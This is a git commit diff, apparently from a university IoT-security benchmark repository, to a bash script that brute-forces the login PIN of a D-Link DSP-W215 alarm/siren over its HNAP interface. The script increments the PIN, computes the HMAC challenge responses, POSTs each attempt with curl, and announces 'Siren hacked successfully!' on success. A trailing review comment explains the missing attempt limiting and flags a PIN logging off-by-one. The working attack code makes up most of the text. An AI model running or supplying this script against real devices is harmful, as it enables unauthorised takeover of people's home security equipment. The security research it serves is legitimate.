Perfecting brute-force attack for D-Link alarm/siren; basically we have to always...
author
rtrimana
<rtrimana@uci.edu>
Thu, 21 Dec 2017 23:04:35 +0000
(15:04 -0800)
committer
rtrimana
<rtrimana@uci.edu>
Thu, 21 Dec 2017 23:04:35 +0000
(15:04 -0800)
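--- a/benchmarks/other/DLinkAlarm/attack.sh
+++ b/benchmarks/other/DLinkAlarm/attack.sh
@@ -1,7 +1,8 @@
 #!/bin/bash
 #modify next two line for your DSP-W215
-IP="192.168.0.35"
-PIN=215530
+IP="192.168.0.4"
+#PIN=0
+PIN=215500
 #do not modify after this line if you don't know what you are doing
 function usage {
@@ -29,6 +30,10 @@ end="</soap:Body></soap:Envelope>"
 message="<Login xmlns=\"http://purenetworks.com/HNAP1/\"><Action>request</Action><Username>admin</Username><LoginPassword>$password</LoginPassword><Captcha/></Login>"
 loginrequest="$head$message$end"
+loop=true
+while $loop
+ do
+
 ret=`curl -s -X POST -H "$contentType" -H "$soapLogin" --data-binary "$loginrequest" http://$IP/HNAP1`
 function getResult {
@@ -36,15 +41,12 @@ function getResult {
 echo -n "$opt"
 }
-PIN=0
-
-while true
- do
-echo -e $PIN
+echo -e "Current pin: $PIN"
 let PIN=$PIN+1
 challenge=`getResult Challenge`
 cookie="Cookie: uid=`getResult Cookie`"
 publickey="`getResult PublicKey`$PIN"
+echo -e "Public key: $publickey"
 privatekey=`hash_hmac "$challenge" "$publickey"`
 password=`hash_hmac "$challenge" "$privatekey"`
 timestamp=`date +%s`
@@ -60,6 +62,13 @@ login="$head$message$end"
 mret=`curl -s -X POST -H "$contentType" -H "$soapLogin" -H "$hnap_auth" -H "$cookie" --data-binary "$login" http://$IP/HNAP1`
 echo -e "$mret"
+status=`echo -n "$mret" | grep -Po "(?<=<LoginResult>).*(?=</LoginResult>)"`
+echo -e "Status: $status\n\n"
+if [ $status = "success" ]
+then
+ echo -e "SUCCESSFUL ATTEMPT: Siren hacked successfully! The pin is: $PIN\n\n\n"
+ loop=false
+fi
 done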
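Review bot: The retry loop opened by `while $loop` has no comment stating what the benchmark demonstrates, namely that the device's HNAP login appears to accept an unbounded series of attempts against a numeric PIN, with no delay or lockout handled anywhere in the visible code. A header such as `# Benchmark: repeats the HNAP Login exchange against a lab device until LoginResult is "success"; exercises the absence of attempt limiting` would record that, and it tells a reader building detections what the traffic looks like: back-to-back POSTs to /HNAP1 from one client. The new `echo -e "Current pin: $PIN"` also runs before `let PIN=$PIN+1`, so each iteration logs a value one lower than the PIN it submits, while the success message prints the submitted one; the run log and the reported result therefore disagree. The loop body spans several hunks and parts of it, including `getResult`, lie outside the lines shown.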